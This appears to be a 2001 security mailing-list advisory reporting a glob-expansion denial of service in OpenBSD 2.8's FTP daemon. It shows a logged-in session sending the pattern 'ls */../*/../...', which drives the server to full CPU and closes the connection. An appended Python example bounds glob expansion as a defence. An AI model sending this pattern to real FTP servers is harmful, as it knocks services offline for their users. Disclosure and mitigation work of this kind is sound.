Date: Tue, 20 Mar 2001 08:38:31 -0800
From: Peter Timothey Hessler <[email protected]>
To: [email protected]
Subject: Multiple vendors FTP denial of service
OpenBSD 2.8 (from cd) goes to 100% CPU. Just ftpd, sshd and telnetd
running.
ftpd ran from /etc/rc; shell is bash. Relevant system info: Pentium 133,
32Meg RAM, 4Gig hard drive, 100baseT NIC.
Connected to 127.0.0.1.
220 phobos FTP server (Version 6.5/OpenBSD) ready.
Name (127.0.0.1:luser): luser
331 Password required for luser.
Password:
230 User luser logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
(pause for approx. 120 seconds)
229 Entering Extended Passive Mode (|||10965|)
421 Service not available, remote server has closed connection.
ftp>
After ftpd is using >90% CPU, I can still log in and work like normal,
with a small noticeable delay.
--
Peter Hessler
Paychex Inc. MMS Pleasanton Branch
Tech Support 925-463-6500
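
The following is an added example, not part of the original post and not code from any ftpd: it shows why the pattern in the session above is expensive (each `*/../` hop multiplies the candidate paths by the number of subdirectories) and one way a server could bound the expansion with a step budget. The in-memory tree, the 10,000-step budget and the names `bounded_glob` and `is_rejected` are assumptions made for illustration.

```python
import fnmatch

class GlobBudgetExceeded(Exception):
    """Raised when a pattern would visit more candidates than allowed."""

# Constructed sample tree (not from the post): dict = directory, None = file.
TREE = {"pub": {"a.txt": None, "b.txt": None}, "incoming": {},
        "etc": {"motd": None}, "README": None}

# The pattern from the session above: ten "*/../" hops, then a final "*".
REPORTED_PATTERN = "*/../" * 10 + "*"

def bounded_glob(pattern, root=TREE, max_steps=10_000):
    """Expand pattern against root; return (matches, steps).

    Every candidate path examined costs one step. Exceeding max_steps
    aborts the expansion instead of letting it run to completion.
    """
    segments = [s for s in pattern.split("/") if s]
    matches, steps = [], 0

    def walk(stack, names, i):
        nonlocal steps
        steps += 1
        if steps > max_steps:
            raise GlobBudgetExceeded(f"{pattern!r}: more than {max_steps} steps")
        if i == len(segments):
            matches.append("/".join(names))
            return
        node = stack[-1]
        if node is None:          # a file has no children and no usable ".."
            return
        if segments[i] == "..":   # step back up; the root is its own parent
            walk(stack[:-1] if len(stack) > 1 else stack, names + [".."], i + 1)
            return
        for name in sorted(node):
            if fnmatch.fnmatchcase(name, segments[i]):
                walk(stack + [node[name]], names + [name], i + 1)

    walk([root], [], 0)
    return matches, steps

def is_rejected(pattern, max_steps=10_000):
    """True if the pattern blows the budget and should be refused."""
    try:
        bounded_glob(pattern, max_steps=max_steps)
    except GlobBudgetExceeded:
        return True
    return False
```

With three subdirectories and one file at the root, one hop yields 12 matches and ten hops would yield 4 × 3^10 = 236,196, so the budget trips long before the expansion finishes.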